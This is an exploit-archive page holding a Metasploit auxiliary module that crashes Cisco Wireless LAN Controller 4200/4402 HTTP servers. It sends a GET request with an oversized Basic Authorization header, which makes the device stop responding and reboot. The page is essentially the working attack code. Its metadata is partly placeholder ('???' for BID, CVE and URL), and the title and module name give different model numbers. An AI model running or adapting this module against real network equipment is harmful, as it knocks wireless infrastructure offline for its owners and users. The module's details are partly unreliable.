Cisco WLC 4402 Basic Auth Remote Denial of Service (meta)

2009-07-27 18:35:51

require 'msf/core'


class Metasploit3 < Msf::Auxiliary

include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos

def initialize(info = {})
super(update_info(info,
'Name' => 'Cisco WLC 4200 Basic Auth Denial of Service',
'Description' => %q{

This module triggers a Denial of Service condition in the Cisco WLC 4200
HTTP server. By sending a GET request with long authentication data, the
device becomes unresponsive and reboots. Firmware is reportedly vulnerable.
},
'Author' => [ 'Christoph Bott <msf[at]bott.syss.de>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 5949 $',
'References' =>
[
[ 'BID', '???'],
[ 'CVE', '???'],
[ 'URL', 'http://www.cisco.com/?????'],
],
'DisclosureDate' => 'January 26 2009'))

register_options(
[
Opt::RPORT(80),
], self.class)

end

def run
connect

print_status("Sending HTTP DoS packet")

sploit =
"GET /screens/frameset.html HTTP/1.0\r\n" +
"Authorization: Basic MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDoxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0"

sock.put(sploit + "\r\n")

disconnect
end

end

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.